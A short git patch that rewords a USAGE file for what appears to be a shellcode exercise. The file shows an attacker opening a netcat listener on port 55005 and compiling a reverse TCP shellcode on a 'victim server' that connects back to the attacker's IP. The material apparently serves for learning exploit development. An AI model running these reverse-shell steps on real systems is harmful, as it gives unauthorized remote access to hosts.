From 1777bdaa221ae59198bec7f23abb8b3bca966ede Mon Sep 17 00:00:00 2001 From: arno01 Date: Wed, 13 Mar 2013 08:37:41 +0100 Subject: [PATCH] minor updates --- exam2/USAGE | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/exam2/USAGE b/exam2/USAGE index 55ea17b..73f29e7 100644 --- a/exam2/USAGE +++ b/exam2/USAGE @@ -1,12 +1,12 @@ USAGE -1. attacker has 192.168.1.149 IP and runs nc to listen on 55005 port +1. For example, you are an attacker with 192.168.1.149 IP. Run nc to listen on 55005 port attacker $ nc -vl 55005 [do not close it] -2. Running shellcode a victim server +2. Running shellcode on a victim server exam2$ ./compile_all.sh shell_reverse_tcp 192.168.1.149 55005 [I] Using custom port: 55005 [+] Assembling shell_reverse_tcp.nasm with NASM ...